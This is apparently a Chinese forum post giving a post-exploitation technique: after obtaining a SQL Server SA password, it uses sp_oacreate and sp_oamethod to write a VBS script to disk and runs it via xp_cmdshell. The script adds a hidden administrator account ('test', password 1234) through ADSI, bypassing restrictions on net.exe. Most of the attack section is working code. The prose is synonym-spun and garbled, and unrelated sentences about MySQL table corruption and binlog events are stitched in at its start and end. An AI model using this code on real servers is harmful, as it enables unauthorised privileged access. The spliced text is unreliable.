|
|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
由MySQL用来存储数据的文件格式以已经被广泛地测试过,但是总是有外部情况可以导致数据库表被破坏:在取得SA暗码后,常常由于服务器办理者或”后人”将net.exe和net1.exe被限定利用,没法增加办理员账号。我们晓得VBS在举动目次(ADSI)部分有一个winnt工具,用来办理当地资本,使用它能够不依托CMD等命令就可以增加一个办理员,详细代码以下:</p>在取得SA暗码后,常常由于服务器办理者或”后人”将net.exe和net1.exe被限定利用,没法增加办理员账号。我们晓得VBS在举动目次(ADSI)部分有一个winnt工具,用来办理当地资本,使用它能够不依托CMD等命令就可以增加一个办理员,详细代码以下:
setwsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Setob=GetObject(os)失掉adsi接口,绑定
Setoe=GetObject(os&"/Administrators,group")属性,admin组
Setod=ob.Create("user","test")创建用户
od.SetPassword"1234"设置暗码
od.SetInfo保留
Setof=GetObject(os&"/test",user)失掉用户
oe.addos&"/test"
将下面的代码保留为1.vbs,然后实行,命令为“cscript1.vbs”,如许就会在体系增加一个体系名为test,暗码为1234的用户。详细在查询剖析器实行的代码以下:
declare@oint,@fint,@tint,@retint
execsp_oacreatescripting.filesystemobject,@oout
execsp_oamethod@o,createtextfile,@fout,c:1.vbs,1
exec@ret=sp_oamethod@f,writeline,NULL,setwsnetwork=CreateObject("WSCRIPT.NETWORK")
exec@ret=sp_oamethod@f,writeline,NULL,os="WinNT://"&wsnetwork.ComputerName
exec@ret=sp_oamethod@f,writeline,NULL,Setob=GetObject(os)
exec@ret=sp_oamethod@f,writeline,NULL,Setoe=GetObject(os&"/Administrators,group")
exec@ret=sp_oamethod@f,writeline,NULL,Setod=ob.Create("user","test")
exec@ret=sp_oamethod@f,writeline,NULL,od.SetPassword"1234"
exec@ret=sp_oamethod@f,writeline,NULL,od.SetInfo
exec@ret=sp_oamethod@f,writeline,NULL,Setof=GetObject(os&"/test",user)
exec@ret=sp_oamethod@f,writeline,NULL,oe.addos&"/test"
实行完下面的语句,再实行上面这行代码,这行代码必定独自实行,不要与下面的放在一同实行,不然会提醒“c:1.vbs正被另外一个程序运转”而没法乐成增加用户:
execmaster..xp_cmdshellcscriptc:1.vbs
假如体系用户没有增加乐成,有多是由于体系用户的暗码1234的太复杂,不切合服务器的庞大暗码战略,能够思索设置的庞大些,然后再测试一下。也能够利用echo将代码写到1.vbs中,代码格局为:
execmaster..xp_cmdshellechosetwsnetwork=CreateObject("WSCRIPT.NETWORK")>>1.vbs
对于insert操作,只需要把event_type改成DELETE_ROWS_EVENT;对于delete操作,改成WRITE_ROWS_EVENT |
|
|Archiver|手机版|仓酷云
鄂ICP备14007578号-2
发表于 2015-1-16 22:15:37
收藏
转播
分享
淘帖
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜